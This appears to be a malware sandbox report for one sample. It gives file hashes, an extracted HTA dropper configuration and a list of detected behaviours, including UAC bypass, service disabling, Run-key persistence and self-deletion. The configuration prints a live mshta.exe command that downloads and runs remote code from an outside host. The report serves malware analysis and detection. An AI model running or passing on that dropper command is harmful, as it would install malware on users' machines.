Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    f0cbf6929fda2a51baf7dd154b94342f_JaffaCakes118

  • Size

    2.2MB

  • Sample

    240921-24zktazake

  • MD5

    f0cbf6929fda2a51baf7dd154b94342f

  • SHA1

    e65312de31ec555e464d7b05d424918f8f696304

  • SHA256

    e24d4e9188c3fa5246436b14a81489dd93dc8e1d99f9fdd0abaa207acd4c157e

  • SHA512

    d24646dfac190148da7179f3ccd9e2f02e6aed631527265803937251f27c57eef6c26c03daac7694248b46233c6d296a98d47bd11dcb45c77f35e75cc27a78f0

  • SSDEEP

    24576:+kv4d+NvM4auS/eY/q/fBuLARQoclgvO4JppSGtpI3BTBWU/8VaRNX2B9A:vv409R8qXBuL6O4VS6G3xUU/8VaPmY

Malware Config

Extracted

Language
hta
Source
1
mshta.exe "http://galaint.onlinesecstats.info/?0=118&1=2&2=1&3=59&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vevabuudpc&14=1"
URLs
hta.dropper

http://galaint.onlinesecstats.info/?0=118&1=2&2=1&3=59&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=vevabuudpc&14=1

Targets

    • Target

      f0cbf6929fda2a51baf7dd154b94342f_JaffaCakes118

    • Size

      2.2MB

    • MD5

      f0cbf6929fda2a51baf7dd154b94342f

    • SHA1

      e65312de31ec555e464d7b05d424918f8f696304

    • SHA256

      e24d4e9188c3fa5246436b14a81489dd93dc8e1d99f9fdd0abaa207acd4c157e

    • SHA512

      d24646dfac190148da7179f3ccd9e2f02e6aed631527265803937251f27c57eef6c26c03daac7694248b46233c6d296a98d47bd11dcb45c77f35e75cc27a78f0

    • SSDEEP

      24576:+kv4d+NvM4auS/eY/q/fBuLARQoclgvO4JppSGtpI3BTBWU/8VaRNX2B9A:vv409R8qXBuL6O4VS6G3xUU/8VaPmY

    • Disables service(s)

    • UAC bypass

    • Disables taskbar notifications via registry modification

    • Event Triggered Execution: Image File Execution Options Injection

    • Stops running service(s)

    • Deletes itself

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Indicator Removal: File Deletion

      Adversaries may delete files left behind by the actions of their intrusion activity.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.